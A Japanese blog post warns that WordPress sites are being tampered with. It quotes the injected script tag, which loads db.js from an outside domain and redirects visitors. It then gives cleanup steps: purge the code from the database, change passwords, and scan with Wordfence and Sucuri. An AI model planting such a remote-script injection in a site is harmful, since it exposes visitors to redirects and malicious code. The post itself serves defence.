【ご注意】WordPressの不正コード改ざん
2022/03/25
WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。
下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。
<script type=’text/javascript’ src=’https://sdb.dancewithme.biz/db.js’></script>
※sは故意に全角に変えております
改ざんされた場合は下記の手順で修正してください。
データベース周り
まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。
削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。
WordPressでのチェック
まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。
チェック後異常箇所を変更します。
Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。
皆様、ご注意ください。
関連記事
-
-
「パスワードは、記号を含むか、20 文字以上でなければなりません。」で苦しんだ話
ワードプレスのユーザーを追加する際、パスワードを設定するんですが、ここでつまづい …
-
-
WordPress 不正アクセスとの飽くなき戦い
不正アクセス・・・それはWEB黎明期から行われてきた悪しき犯罪。 これらと日々戦 …
-
-
Gist、いいね!
コード見せたいンゴ・・・ WordPressのことでよくコードをお見せする機会が …
-
-
Sydneyで正方形のアイキャッチ画像を使いたかった話
通常、WordPressでアイキャッチ画像を設定すると、そのサイズでアイキャッチ …
-
-
月別アーカイブページでカテゴリ指定
月別アーカイブページでカテゴリ指定したい・・・ でも、query_postsやW …
-
-
category.php内で現在のカテゴリを取得する
カテゴリの取得でハマったので忘備録しておきます。 いつもはget_the_cat …
-
-
PHPのバージョン変更したことでエラーが出る
PHPバージョン7系のサーバーからPHPバージョン8系サーバーにサイト移管した時 …
-
-
get_postsの初期値が5件だった件
もう、表題のとおりなんですが忘備録。 WordPressのget_postsの初 …
-
-
アーカイブページでタームごとに記事一覧を出力する
カスタム投稿の記事一覧を出したい ターム名1(カスタム投稿の「カテゴリ名」のよう …
-
-
マルチサイトで複数のブログの新着情報を取得したい
WordPressでマルチサイトの新着情報を取りたいなーと思うことがあったのでメ …